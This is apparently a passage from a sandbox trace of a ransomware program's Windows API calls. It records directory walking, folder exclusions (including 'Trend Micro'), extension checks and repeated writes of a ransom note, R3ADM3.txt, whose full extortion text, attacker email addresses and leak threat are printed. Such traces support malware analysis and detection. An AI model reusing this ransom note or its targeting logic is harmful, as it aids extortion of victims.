lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0156.254] CloseHandle (hObject=0x6dc) returned 1 [0156.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0156.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0156.255] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62182c50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62182c50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0156.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0156.256] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62182c50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62182c50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0156.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0156.256] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0156.256] lstrcmpW (lpString1="install.ins", lpString2=".") returned 1 [0156.256] lstrcmpW (lpString1="install.ins", lpString2="..") returned 1 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".UAKXC") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".exe") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".dll") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".lnk") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".sys") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch=".msi") returned 0x0 [0156.256] StrStrIW (lpFirst="install.ins", lpSrch="R3ADM3.txt") returned 0x0 [0156.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0156.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0156.256] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0156.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0156.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0156.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0156.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0156.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0156.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0156.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef328 [0156.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0156.257] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0156.257] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62182c50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62182c50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62182c50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0156.257] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0156.257] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0156.257] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0156.257] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62182c50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62182c50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62182c50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0156.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0156.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecdd8 | out: hHeap=0xea0000) returned 1 [0156.258] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0156.258] Sleep (dwMilliseconds=0x32) [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef3a0 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32890 [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef3a0 | out: hHeap=0xea0000) returned 1 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef3a0 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdd8 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32980 [0156.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32980 | out: hHeap=0xea0000) returned 1 [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0156.681] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecdd8 | out: hHeap=0xea0000) returned 1 [0156.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0156.750] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0156.750] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0156.752] CloseHandle (hObject=0x6dc) returned 1 [0156.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0156.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef3a0 | out: hHeap=0xea0000) returned 1 [0156.752] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x62645850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62645850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0156.753] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0156.753] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x62645850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62645850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.753] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0156.753] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0156.753] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0156.753] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0156.753] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0156.753] StrStrIW (lpFirst="10", lpSrch="tmp") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="winnt") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="temp") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="thumb") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="$Recycle.Bin") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="$RECYCLE.BIN") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="System Volume Information") returned 0x0 [0156.753] StrStrIW (lpFirst="10", lpSrch="Boot") returned 0x0 [0156.754] StrStrIW (lpFirst="10", lpSrch="Windows") returned 0x0 [0156.754] StrStrIW (lpFirst="10", lpSrch="Trend Micro") returned 0x0 [0156.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef3a0 [0156.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0156.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0156.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0156.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef3a0 | out: hHeap=0xea0000) returned 1 [0156.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdd8 [0156.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0156.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0156.755] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62645850, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62645850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62645850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0156.755] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0156.755] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0156.755] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0156.755] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62645850, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62645850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62645850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0156.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee410 | out: hHeap=0xea0000) returned 1 [0156.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0156.755] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0156.755] Sleep (dwMilliseconds=0x32) [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32890 | out: hHeap=0xea0000) returned 1 [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0156.999] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0156.999] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0156.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0157.219] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0157.219] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0157.220] CloseHandle (hObject=0x6dc) returned 1 [0157.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0157.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0157.220] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x62abc190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62abc190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0157.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0157.221] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x62abc190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62abc190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0157.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0157.221] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0157.221] lstrcmpW (lpString1="PUB60COR", lpString2=".") returned 1 [0157.221] lstrcmpW (lpString1="PUB60COR", lpString2="..") returned 1 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="tmp") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="winnt") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="temp") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="thumb") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="$Recycle.Bin") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="$RECYCLE.BIN") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="System Volume Information") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="Boot") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="Windows") returned 0x0 [0157.221] StrStrIW (lpFirst="PUB60COR", lpSrch="Trend Micro") returned 0x0 [0157.221] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0157.221] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0157.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0157.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0157.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0157.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0157.222] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0157.222] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0157.222] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="tmp") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="winnt") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="temp") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="thumb") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="$Recycle.Bin") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="$RECYCLE.BIN") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="System Volume Information") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="Boot") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="Windows") returned 0x0 [0157.222] StrStrIW (lpFirst="Publisher", lpSrch="Trend Micro") returned 0x0 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21150 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0157.222] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21150 | out: hHeap=0xea0000) returned 1 [0157.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21150 [0157.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef3a0 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0157.223] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62abc190, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62abc190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62abc190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0157.223] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0157.223] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0157.223] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0157.223] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62abc190, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x62abc190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x62abc190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0157.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0157.223] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0157.224] Sleep (dwMilliseconds=0x32) [0157.638] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc08 | out: hHeap=0xea0000) returned 1 [0157.638] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0157.638] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32890 [0157.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0157.639] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32980 [0157.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: 